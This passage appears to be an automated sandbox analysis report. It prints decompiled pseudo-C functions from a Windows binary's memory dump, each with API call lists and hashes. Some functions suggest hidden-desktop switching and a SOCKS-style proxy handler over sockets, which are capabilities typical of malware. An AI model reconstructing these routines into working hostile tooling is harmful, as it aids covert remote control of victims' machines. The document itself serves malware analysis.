    						SetWindowLongW(_t39, 0xfffffff0, GetWindowLongW(_t39, 0xfffffff0) & 0xf7ffffff);
    						return _t23;
    					} else {
    						return _t16;
    					}
    				}
    			}

    APIs
    • WindowFromPoint.USER32(?,?), ref: 00416F19
    • SendMessageTimeoutW.USER32 ref: 00416F49
    • GetWindowLongW.USER32(00000000,000000F0), ref: 00416F6F
    • SetWindowLongW.USER32 ref: 00416F80
    • GetWindowLongW.USER32(00000000,000000F0), ref: 00416F9C
    • SetWindowLongW.USER32 ref: 00416FA7
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Window$Long$FromMessagePointSendTimeout
    • String ID:
    • API String ID: 2645164282-0
    • Opcode ID: f5a80c0cded3bae43f8e9bee253070bf1f75ae18eecc1b85373258387dcfc702
    • Instruction ID: 974ed6c944f1da488938000a367dba6d063fae83a09b807688668f3bb22a8361
    • Opcode Fuzzy Hash: f5a80c0cded3bae43f8e9bee253070bf1f75ae18eecc1b85373258387dcfc702
    • Instruction Fuzzy Hash: 712154322082156BD2109A59BC40EBBB3DCEBC5735F10072AF964E33D0DA69DD0987BA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040CDA0(void* __edx) {
    				void* __esi;
    				intOrPtr _t9;
    				void* _t14;
    				intOrPtr _t29;
    				void** _t30;
    				WCHAR* _t31;
    				void* _t32;
    				char* _t33;
    
    				_t9 =  *((intOrPtr*)(__edx + 0x14));
    				_t33 =  *((intOrPtr*)(__edx + 0x18));
    				if( *((intOrPtr*)(_t9 + 0x1c)) > 0 &&  *((intOrPtr*)(_t9 + 0x14)) > 0x40) {
    					_t24 = _t9;
    					_t29 =  *((intOrPtr*)(_t9 + 0x14));
    					if(_t29 != 0) {
    						_t6 = _t29 + 4; // 0x44
    						_t32 = HeapAlloc( *0x42e6d4, 0, _t6);
    						if(_t32 != 0) {
    							E00410820(_t32, _t24, _t29);
    							if(E0040EA70() == 0) {
    								HeapFree( *0x42e6d4, 0, _t32);
    							}
    						}
    					}
    				}
    				if( *_t33 != 0) {
    					L13:
    					return 1;
    				} else {
    					_t30 = _t33 + 8;
    					if(E00419530(_t30) == 0) {
    						if(_t30 != 0) {
    							_t14 =  *_t30;
    							if(_t14 != 0xffffffff) {
    								FlushFileBuffers(_t14);
    								CloseHandle( *_t30);
    								 *_t30 = 0xffffffff;
    							}
    						}
    						_t31 = _t33 + 0x122;
    						SetFileAttributesW(_t31, 0x80);
    						DeleteFileW(_t31);
    						goto L13;
    					} else {
    						return 0;
    					}
    				}
    			}

    APIs
    • HeapAlloc.KERNEL32(?,00000000,00000044), ref: 0040CDCC
      • Part of subcall function 0040EA70: CreateThread.KERNEL32 ref: 0040EA81
      • Part of subcall function 0040EA70: CloseHandle.KERNEL32(00000000), ref: 0040EA8C
    • HeapFree.KERNEL32(?,00000000,00000000,00000000,?,00000040), ref: 0040CDF5
    • FlushFileBuffers.KERNEL32(00000000), ref: 0040CE20
    • CloseHandle.KERNEL32(00000000), ref: 0040CE29
    • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040CE41
    • DeleteFileW.KERNEL32(?), ref: 0040CE48
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: File$CloseHandleHeap$AllocAttributesBuffersCreateDeleteFlushFreeThread
    • String ID:
    • API String ID: 2754212095-0
    • Opcode ID: ea66a9a5e998ddf0fd8965f4115af4d3df8163aaa9c15997168eaa36abebfb1f
    • Instruction ID: f58c899b12f25af628a3cd61be3928e08c2706f5e127636c08044a76f0e901a9
    • Opcode Fuzzy Hash: ea66a9a5e998ddf0fd8965f4115af4d3df8163aaa9c15997168eaa36abebfb1f
    • Instruction Fuzzy Hash: E211D271601610ABC7249F64ED88B9B7B69EF45761F50023AF940BB2D0C738EC42CBE8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 74%
    			E00418040(signed int __eax, WCHAR* __edx, void** __esi) {
    				char _v12;
    				intOrPtr _v16;
    				long _v20;
    				long _v24;
    				void* _t14;
    				long _t17;
    				void* _t18;
    
    				_t34 = __esi;
    				asm("sbb ecx, ecx");
    				_t14 = CreateFileW(__edx, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
    				__esi[2] = _t14;
    				if(_t14 == 0xffffffff) {
    					L11:
    					return 0;
    				} else {
    					__imp__GetFileSizeEx(_t14,  &_v12);
    					if(_t14 == 0 || _v16 != 0) {
    						L10:
    						CloseHandle(_t34[2]);
    						goto L11;
    					} else {
    						_t17 = _v20;
    						__esi[1] = _t17;
    						if(_t17 != 0) {
    							_t18 = VirtualAlloc(0, _t17, 0x3000, 4);
    							 *__esi = _t18;
    							if(_t18 == 0) {
    								goto L10;
    							} else {
    								if(ReadFile(__esi[2], _t18, __esi[1],  &_v24, 0) == 0 || _v24 != __esi[1]) {
    									VirtualFree( *_t34, 0, 0x8000);
    									goto L10;
    								} else {
    									goto L5;
    								}
    							}
    						} else {
    							 *__esi = _t17;
    							L5:
    							return 1;
    						}
    					}
    				}
    			}

    APIs
    • CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,0041D962,?,?,00000000), ref: 00418061
    • GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,00000003,00000000,00000000,?,0041D962,?,?,00000000), ref: 00418075
    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,00000000), ref: 004180A3
    • ReadFile.KERNEL32(0041DE01,00000000,00000001,00000000,00000000,?,00000000), ref: 004180BF
    • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 004180DC
    • CloseHandle.KERNEL32(0041DE01,?,00000000,00000003,00000000,00000000,?,0041D962,?,?,00000000), ref: 004180E6
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
    • String ID:
    • API String ID: 1974014688-0
    • Opcode ID: 17091555beb1751a1be79b7621bc65c54d1e0e9260acc6880353fd6f35fc1204
    • Instruction ID: 84304f4e3ba96eb3429645289d2576c930bc51746f3b1a3cc6250fce95cdf231
    • Opcode Fuzzy Hash: 17091555beb1751a1be79b7621bc65c54d1e0e9260acc6880353fd6f35fc1204
    • Instruction Fuzzy Hash: B81196B4600701AFE7249F24CC46F677BE8EB48B00F51C91DF686D62E0EAB4E884CB14
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0041BD41(void* __eax, struct HWND__* _a8, struct tagRECT* _a12, int _a16) {
    				int _t21;
    				signed int _t22;
    				struct HWND__* _t29;
    				char* _t43;
    
    				_t29 = _a8;
    				if(__eax + 0x42e94b == 0 || WaitForSingleObject( *0x42edbc, 0) == 0) {
    					L9:
    					return GetUpdateRect(_t29, _a12, _a16);
    				} else {
    					_t43 = TlsGetValue( *0x42eea4);
    					if(_t43 == 0 || _t29 !=  *((intOrPtr*)(_t43 + 4))) {
    						goto L9;
    					} else {
    						if(_a12 != 0) {
    							_t4 = _t43 + 0xc; // 0xc
    							E00410820( &_a12, _t4, 0x10);
    						}
    						if(_a16 != 0) {
    							_t21 = SaveDC( *(_t43 + 8));
    							_t22 = SendMessageW(_t29, 0x14,  *(_t43 + 8), 0);
    							asm("sbb eax, eax");
    							 *((intOrPtr*)(_t43 + 0x1c)) =  ~_t22 + 1;
    							RestoreDC( *(_t43 + 8), _t21);
    						}
    						 *_t43 = 1;
    						return 1;
    					}
    				}
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0041BD5B
    • TlsGetValue.KERNEL32(?), ref: 0041BD6C
    • SaveDC.GDI32(?), ref: 0041BDA0
    • SendMessageW.USER32(?,00000014,?,00000000), ref: 0041BDB1
    • RestoreDC.GDI32(?,00000000), ref: 0041BDC4
    • GetUpdateRect.USER32 ref: 0041BDE3
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
    • String ID:
    • API String ID: 3142230470-0
    • Opcode ID: 910478eb870fae079cbfc32dede414d7165ddc7d7c678898cf00274ee62d59a4
    • Instruction ID: 5abc7b75c81bd0c1ec54410e0cf48dd606826a7ea53d08634da016aa3c7a1b20
    • Opcode Fuzzy Hash: 910478eb870fae079cbfc32dede414d7165ddc7d7c678898cf00274ee62d59a4
    • Instruction Fuzzy Hash: 511151726003019BD725DB65ED88FDBB7E8EF88701F04891EF185972A0D778E885CBA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004156D0(HANDLE* _a4) {
    				struct tagMSG _v28;
    				long _t9;
    				long _t27;
    
    				_t9 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
    				_t27 = _t9;
    				if(_t27 == 1) {
    					do {
    						if(PeekMessageW( &_v28, 0, 0, 0, 1) == 0) {
    							goto L6;
    						}
    						while(_v28.message != 0x12) {
    							TranslateMessage( &_v28);
    							DispatchMessageW( &_v28);
    							if(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
    								continue;
    							}
    							goto L6;
    						}
    						break;
    						L6:
    						_t27 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
    					} while (_t27 == 1);
    					return _t27;
    				}
    				return _t9;
    			}







    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Message$MultipleObjectsPeekWait$DispatchTranslate
    • String ID:
    • API String ID: 1800058468-0
    • Opcode ID: 8a72eda1b7afc94af45fb6cf2009e0871459cc90412e5793c6ef195645c7bdab
    • Instruction ID: 39ef73abcc481dd9ca0d32de890b917f32e69bb72bca8ecf3a07ed9730486b46
    • Opcode Fuzzy Hash: 8a72eda1b7afc94af45fb6cf2009e0871459cc90412e5793c6ef195645c7bdab
    • Instruction Fuzzy Hash: 5711CC72644311FBE320E7689D82FE7B398BBC4B10F540629F764772E0D6B5E8448669
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040DA70(void* __eax, intOrPtr _a4) {
    				short _v524;
    				short _v1044;
    				void* _v1048;
    				void* __edi;
    				void* _t20;
    				void* _t25;
    				void* _t33;
    				WCHAR* _t34;
    
    				_t33 = __eax;
    				_t25 = 0;
    				if(GetTempPathW(0xf6,  &_v524) - 1 <= 0xf5 && GetTempFileNameW( &_v524, L"bc", 0,  &_v1044) != 0) {
    					SetFileAttributesW( &_v1044, 0x80);
    					if(DeleteFileW( &_v1044) != 0) {
    						_t20 = E004162C0( &_v1044, _t33, _a4);
    						_t41 = _t20;
    						if(_t20 != 0) {
    							_t34 =  &_v1044;
    							_t25 = E0040DA00(_t34, _t41, _t33, ( &_v1044)[0x216]);
    							SetFileAttributesW(_t34, 0x80);
    							DeleteFileW(_t34);
    						}
    					}
    				}
    				return _t25;
    			}












    APIs
    • GetTempPathW.KERNEL32(000000F6,?,?,?,?,00000001), ref: 0040DA8B
    • GetTempFileNameW.KERNEL32(?,00401780,00000000,?,?,00000001), ref: 0040DAAD
    • SetFileAttributesW.KERNEL32(?,00000080,?,00000001), ref: 0040DAC7
    • DeleteFileW.KERNEL32(?,?,00000001), ref: 0040DAD4
      • Part of subcall function 004162C0: HeapFree.KERNEL32(?,00000000,74B5FBB0,00000000,?,?,00000001), ref: 00416371
      • Part of subcall function 004162C0: FreeLibrary.KERNEL32(?,?,00000001), ref: 00416385
      • Part of subcall function 004162C0: HeapDestroy.KERNEL32(00000000,?,00000001), ref: 00416392
      • Part of subcall function 0040DA00: VirtualFree.KERNEL32(?,00000000,00008000,00000002,?,?,?), ref: 0040DA4D
      • Part of subcall function 0040DA00: CloseHandle.KERNEL32(?,00000002,?,?,?), ref: 0040DA5C
    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000001), ref: 0040DB0D
    • DeleteFileW.KERNEL32(?,?,00000001), ref: 0040DB12
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Free$AttributesDeleteHeapTemp$CloseDestroyHandleLibraryNamePathVirtual
    • String ID:
    • API String ID: 1629315103-0
    • Opcode ID: 03c559fe1e023223da8d0de7e16b4b3529370fd1a7f6761562c2f73481aa2648
    • Instruction ID: cce1326d6996a1784566e6d399f037ac32df646e845cc88377a18f5232f401ab
    • Opcode Fuzzy Hash: 03c559fe1e023223da8d0de7e16b4b3529370fd1a7f6761562c2f73481aa2648
    • Instruction Fuzzy Hash: D911A0727442456AD620EB65DC41FEB77ACEBC8780F04493EB640A7190DA38E80CC779
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041C040() {
    				struct tagMSG _v32;
    				signed int _t13;
    
    				SetThreadPriority(GetCurrentThread(), 1);
    				SetEvent( *0x42eeac);
    				_t13 = GetMessageW( &_v32, 0xffffffff, 0, 0);
    				if(_t13 != 0xffffffff) {
    					while(_t13 != 0) {
    						if(_v32.message ==  *0x42eea8 && _v32.wParam == 0xfffffffc) {
    							 *((char*)( *0x42eeb0 + 0x124)) = E0041B6E0( *0x42eeb0 + 0x114,  *0x42eeb0 + 0x114, 0x42eea0, _v32.lParam, 1);
    							SetEvent( *0x42eeac);
    						}
    						_t13 = GetMessageW( &_v32, 0xffffffff, 0, 0);
    						if(_t13 != 0xffffffff) {
    							continue;
    						}
    						goto L6;
    					}
    				}
    				L6:
    				return _t13 & 0xffffff00 | _t13 == 0x00000000;
    			}






    APIs
    • GetCurrentThread.KERNEL32 ref: 0041C04D
    • SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,0041DDE9), ref: 0041C054
    • SetEvent.KERNEL32(?,?,?,?,?,?,?,0041DDE9), ref: 0041C066
    • GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 0041C079
    • SetEvent.KERNEL32(?,0042EEA0,?,00000001), ref: 0041C0C4
    • GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 0041C0D1
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: EventMessageThread$CurrentPriority
    • String ID:
    • API String ID: 709478964-0
    • Opcode ID: 14b9f14c41ad5068a75e8facd5baebdd600b9d88a5ebfef25757d0857e53f5e3
    • Instruction ID: b3764b2c0785421e7a4c9a4fe64593d485a003a013d0d16c67160791eddff067
    • Opcode Fuzzy Hash: 14b9f14c41ad5068a75e8facd5baebdd600b9d88a5ebfef25757d0857e53f5e3
    • Instruction Fuzzy Hash: 2011A332640300ABD720DBB99D85BDA7B55AB88770F20072DF520932E0D774E486C79D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041A2F0(void* __ecx, struct HDESK__* _a4) {
    				void* __edi;
    				struct HDESK__* _t4;
    				int _t6;
    				void* _t13;
    				void* _t19;
    				void* _t20;
    
    				_t4 = GetThreadDesktop(GetCurrentThreadId());
    				_t13 = 0;
    				_t20 = E0041A1E0(_t4);
    				if(_t20 == 0) {
    					L6:
    					_t6 = SetThreadDesktop(_a4);
    					if(_t6 != 0) {
    						goto L8;
    					} else {
    						return _t6;
    					}
    				} else {
    					_t19 = E0041A1E0(_a4);
    					if(_t19 != 0) {
    						if(lstrcmpiW(_t20, _t19) == 0) {
    							_t13 = 1;
    						}
    						HeapFree( *0x42e6d4, 0, _t19);
    					}
    					HeapFree( *0x42e6d4, 0, _t20);
    					if(_t13 != 0) {
    						L8:
    						return 1;
    					} else {
    						goto L6;
    					}
    				}
    			}










    APIs
    • GetCurrentThreadId.KERNEL32 ref: 0041A2F3
    • GetThreadDesktop.USER32(00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A2FA
      • Part of subcall function 0041A1E0: GetUserObjectInformationW.USER32(00000000,00000002,?,00000000,?,00000000), ref: 0041A207
      • Part of subcall function 0041A1E0: HeapAlloc.KERNEL32(?,00000008,?), ref: 0041A229
      • Part of subcall function 0041A1E0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,?,?), ref: 0041A243
    • lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A327
    • HeapFree.KERNEL32(?,00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A33C
    • HeapFree.KERNEL32(?,00000000,00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A348
    • SetThreadDesktop.USER32(?,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A354
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: HeapThread$DesktopFreeInformationObjectUser$AllocCurrentlstrcmpi
    • String ID:
    • API String ID: 589007651-0
    • Opcode ID: 8619d38f70af140a8d443ce01c9244cf01e54c095599268d267555844530ff07
    • Instruction ID: 91ae4d9f89298637f7c4850ecbaa899cb87559722f449cc8e7fd8bbad95ecfe0
    • Opcode Fuzzy Hash: 8619d38f70af140a8d443ce01c9244cf01e54c095599268d267555844530ff07
    • Instruction Fuzzy Hash: BB01623234230567C320A766AD48FAB776DABD5BA1F18443AFA10D7220DA39D851C76E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00406260(struct HDC__** __esi) {
    				void* _t9;
    				void* _t10;
    				void* _t11;
    				void* _t23;
    
    				_t23 = __esi;
    				SelectObject( *__esi, __esi[1]);
    				DeleteObject(__esi[4]);
    				_t9 = __esi[7];
    				if(_t9 != 0) {
    					HeapFree( *0x42e6d4, 0, _t9);
    				}
    				_t10 =  *(_t23 + 0x18);
    				if(_t10 != 0) {
    					HeapFree( *0x42e6d4, 0, _t10);
    				}
    				_t11 =  *(_t23 + 0x44);
    				if(_t11 != 0) {
    					HeapFree( *0x42e6d4, 0, _t11);
    				}
    				return HeapFree( *0x42e6d4, 0, _t23);
    			}








    APIs
    • SelectObject.GDI32(?,?), ref: 00406268
    • DeleteObject.GDI32(?), ref: 00406272
    • HeapFree.KERNEL32(?,00000000,?,?,?,00000000,00406C72), ref: 0040628E
    • HeapFree.KERNEL32(?,00000000,?,?,?,00000000,00406C72), ref: 004062A1
    • HeapFree.KERNEL32(?,00000000,?,?,?,00000000,00406C72), ref: 004062B4
    • HeapFree.KERNEL32(?,00000000,00000000,?,?,00000000,00406C72), ref: 004062BF
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FreeHeap$Object$DeleteSelect
    • String ID:
    • API String ID: 420294138-0
    • Opcode ID: 56819ad5531f2e81198f249482baccdba279cf3b0509d61ed396d62f4abd1f2a
    • Instruction ID: 02b928c4a94aabe9458f7401b4cdfdb2956d8a2c385be4e98722b0d069f914ad
    • Opcode Fuzzy Hash: 56819ad5531f2e81198f249482baccdba279cf3b0509d61ed396d62f4abd1f2a
    • Instruction Fuzzy Hash: A0F07975300600ABD634EB6AED84F27B3ACAB98700F95492DBA45D76A0C674FC018B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00426790() {
    				void* _t2;
    				void* _t3;
    				void* _t4;
    				long _t5;
    				void* _t6;
    				void* _t7;
    				void* _t8;
    
    				if(( *0x42e8f8 & 0x00000004) != 0) {
    					_t3 =  *0x42eebc;
    					if(_t3 != 0) {
    						DeleteObject(_t3);
    					}
    					_t4 =  *0x42eeac;
    					if(_t4 != 0) {
    						CloseHandle(_t4);
    					}
    					_t5 =  *0x42eea4;
    					if(_t5 != 0xffffffff) {
    						TlsFree(_t5);
    					}
    					_t6 =  *0x42eeb4;
    					if(_t6 != 0) {
    						CloseHandle(_t6);
    					}
    					_t7 =  *0x42eeb0;
    					if(_t7 != 0) {
    						UnmapViewOfFile(_t7);
    					}
    					_t8 =  *0x42eea0;
    					if(_t8 != 0) {
    						_t8 = CloseHandle(_t8);
    					}
    					return _t8;
    				}
    				return _t2;
    			}











    APIs
    • DeleteObject.GDI32(?), ref: 004267A3
    • CloseHandle.KERNEL32(?,?,0041DDF0), ref: 004267BA
    • TlsFree.KERNEL32(?,?,0041DDF0), ref: 004267C7
    • CloseHandle.KERNEL32(?,?,0041DDF0), ref: 004267D7
    • UnmapViewOfFile.KERNEL32(?,?,0041DDF0), ref: 004267E3
    • CloseHandle.KERNEL32(?,?,0041DDF0), ref: 004267F3
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$DeleteFileFreeObjectUnmapView
    • String ID:
    • API String ID: 356342017-0
    • Opcode ID: 72ae9c72467b55cf1f3f3ed2cefb1c8480e9cc6d8ae53495578fe64ef9bbd4ed
    • Instruction ID: f98a78428e86270f867a08fed1b839b1ba65c536a329dc7881f91f5ff442469f
    • Opcode Fuzzy Hash: 72ae9c72467b55cf1f3f3ed2cefb1c8480e9cc6d8ae53495578fe64ef9bbd4ed
    • Instruction Fuzzy Hash: 6DF0AF747002615BDB209B7ABD88B5736AC6B44754796443EA910E33A0D7B8DC42CB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E00409910(intOrPtr _a4) {
    				char _v8;
    				char _v256;
    				signed short _v268;
    				signed int _v280;
    				short _v282;
    				char _v284;
    				signed int _v289;
    				short _v291;
    				char _v292;
    				short _v296;
    				short _v298;
    				char _v299;
    				signed int _v300;
    				signed int _v304;
    				char _v305;
    				char _v306;
    				intOrPtr _v308;
    				intOrPtr _v320;
    				char _v322;
    				intOrPtr _v332;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				char* _t67;
    				signed int _t68;
    				void* _t86;
    				void* _t90;
    				intOrPtr _t113;
    				signed int _t117;
    				void* _t140;
    				void* _t141;
    				void* _t143;
    				intOrPtr _t144;
    				intOrPtr _t147;
    				intOrPtr _t150;
    				void* _t151;
    
    				_t151 =  &_v296;
    				_t113 = _a4;
    				_t67 =  &_v292;
    				_v292 = 0x80;
    				__imp__#6(_t113,  &_v256, _t67);
    				if(_t67 != 0) {
    					_t68 = 0;
    				} else {
    					_t68 = _v268 & 0x0000ffff;
    				}
    				_t149 = 0 | _t68 == 0x00000017;
    				_v300 = _t68 == 0x17;
    				if(E00414B90(7, _t113, 0,  &_v292) == 0) {
    					L8:
    					return 0;
    				} else {
    					if(E00414B90(1, _t113, 0,  &_v305) == 0) {
    						goto L8;
    					} else {
    						while(_v305 != 0) {
    							if(E00414B90(1, _t113, 0,  &_v305) != 0) {
    								continue;
    							} else {
    								goto L8;
    							}
    							goto L47;
    						}
    						_t117 = _v289;
    						_t80 = ((_t117 & 0x00ff0000 | _t117 >> 0x00000010) >> 0x00000008 | (_t117 & 0x0000ff00 | _t117 << 0x00000010) << 0x00000008) - 1;
    						_v306 = 0x5a;
    						if(((_t117 & 0x00ff0000 | _t117 >> 0x00000010) >> 0x00000008 | (_t117 & 0x0000ff00 | _t117 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
    							L23:
    							_v305 = 1;
    							if(_v306 != 0x5a) {
    								L46:
    								_v296 = 0;
    								_v298 = 0;
    								_v300 = 0;
    								_v299 = _v306;
    								__imp__#19(_t113,  &_v300, 8, 0);
    								return 0xbadbad;
    							} else {
    								E00410870(_t80,  &_v284, 0, 0x10);
    								_v296 = 2;
    								_t86 = (_v304 & 0x000000ff) - 1;
    								if(_t86 == 0) {
    									_v282 = _v291;
    									_v280 = _v289;
    									_t143 = E00414D20( &_v284);
    									if(_t143 == 0xffffffff) {
    										goto L26;
    									} else {
    										E004152F0();
    										_t90 = E00409870(_t143, _t113, 0x5a, _t149);
    										if(_t90 != 1) {
    											if(_t90 != 0xffffffff) {
    												_v305 = 0;
    											} else {
    												_v306 = 0x5b;
    											}
    										} else {
    											_push(_t143);
    											_t90 = E004150D0(_t113);
    										}
    										E004152D0(_t90, _t143);
    										if(_v305 != 1 || _v306 == 0x5a) {
    											goto L37;
    										} else {
    											goto L46;
    										}
    									}
    								} else {
    									if(_t86 == 1) {
    										_t144 = E00414EE0( &_v284, 1);
    										_v308 = _t144;
    										if(_t144 == 0xffffffff) {
    											goto L26;
    										} else {
    											_t140 = E00409870(_t94, _t113, 0x5a, _t149);
    											if(_t140 != 1) {
    												L34:
    												E004152D0(_t95, _t144);
    												if(_t140 == 0xffffffff) {
    													goto L26;
    												} else {
    													if(_t140 != 1) {
    														_v305 = 0;
    													}
    													L37:
    													return _v305;
    												}
    											} else {
    												_t150 = E004152A0( &_v8);
    												E004152D0(_t98, _v304);
    												if(_t150 != 0xffffffff) {
    													E004152F0();
    													_t113 = _v8;
    													_t140 = E00409870(_t150, _t113, 0x5a, _v300 | 0x00000002);
    													if(_t140 == 1) {
    														_push(_t150);
    														_t95 = E004150D0(_t113);
    													}
    													_t144 = _t150;
    													goto L34;
    												} else {
    													_t113 = _v8;
    													_v306 = 0x5b;
    													goto L46;
    												}
    											}
    										}
    									} else {
    										L26:
    										_v306 = 0x5b;
    										goto L46;
    									}
    								}
    							}
    						} else {
    							_t141 = 0;
    							while(E00414B90(1, _t113, 0,  &_v305) != 0) {
    								_t80 = _v305;
    								 *((char*)(_t151 + _t141 + 0x38)) = _t80;
    								if(_t80 == 0) {
    									_v304 = 0;
    									__imp__getaddrinfo( &_v268, 0, 0,  &_v304);
    									if(_t80 != 0) {
    										L22:
    										_v322 = 0x5b;
    									} else {
    										_t80 = _v320;
    										_t147 = _t80;
    										if(_t80 != 0) {
    											while( *((intOrPtr*)(_t147 + 4)) != 2) {
    												_t147 =  *((intOrPtr*)(_t147 + 0x1c));
    												if(_t147 != 0) {
    													continue;
    												} else {
    												}
    												goto L21;
    											}
    											E00410820( &_v305,  *((intOrPtr*)(_t147 + 0x18)) + 4, 4);
    											_t80 = _v332;
    										}
    										L21:
    										__imp__freeaddrinfo(_t80);
    										if(_t147 == 0) {
    											goto L22;
    										}
    									}
    									goto L23;
    								} else {
    									_t141 = _t141 + 1;
    									if(_t141 <= 0xff) {
    										continue;
    									} else {
    										return 0;
    									}
    								}
    								goto L47;
    							}
    							goto L8;
    						}
    					}
    				}
    				L47:
    			}








































    APIs
    • getsockname.WS2_32 ref: 00409934
    • send.WS2_32(?,00000080,00000008,00000000), ref: 00409BF3
      • Part of subcall function 00414B90: select.WS2_32 ref: 00414BF1
      • Part of subcall function 00414B90: recv.WS2_32(?,?,00000007,00000000), ref: 00414C01
    • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00409A2C
    • freeaddrinfo.WS2_32(?), ref: 00409A67
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
